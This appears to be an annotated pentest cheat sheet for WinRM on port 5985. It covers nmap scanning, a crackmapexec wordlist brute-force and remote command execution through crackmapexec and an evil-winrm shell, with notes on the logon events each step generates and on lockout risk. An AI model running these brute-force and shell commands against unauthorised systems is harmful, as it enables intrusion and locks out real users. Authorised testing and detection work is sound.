WinRM-5985
Scan
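# Version detection (-sV) and default NSE scripts (-sC) against TCP 5985.
# -Pn skips host discovery, so the port is probed even if the host ignores
# ping. -oN writes the normal-format report to recon/winrm.
mkdir -p recon   # nmap exits with an error if the -oN directory is missing
# Quote the target so an empty or oddly formatted $IP is not word-split.
nmap -sV -sC -Pn -p 5985 "$IP" -oN recon/winrm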
Brute force
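# crackmapexec
# -p takes either a literal password or a file of candidate passwords;
# /path/to/wordlists is a placeholder for that file.
# Each wrong guess is a failed logon on the target (Windows Security event
# 4625). Repeated failures are what account-lockout policy and 4625 alerting
# are meant to catch, and they can lock out the real user of the account.
# (Tool name corrected: the original line read "crackpmapexec", which does
# not resolve to a command.)
crackmapexec winrm "$IP" -u "$username" -p /path/to/wordlists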
Execute commands
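# crackmapexec
# -x runs the given command on the remote host with the supplied credentials.
# The expansions are quoted so a password containing spaces or shell
# metacharacters reaches the tool as one argument.
# The password travels in argv: it is stored in shell history and is visible
# in the local process list while the command runs.
crackmapexec winrm "$IP" -u "$username" -p "$password" -x "whoami"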
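# evil-winrm (get a shell session)
# Opens an interactive remote shell over WinRM for the given account.
# Quoted expansions keep special characters in the password intact.
# As with any argv password, it ends up in shell history and the local
# process list.
# On the target the session appears as a network logon (Security event 4624,
# logon type 3) and in the Microsoft-Windows-WinRM/Operational log.
evil-winrm -u "$username" -p "$password" -i "$IP"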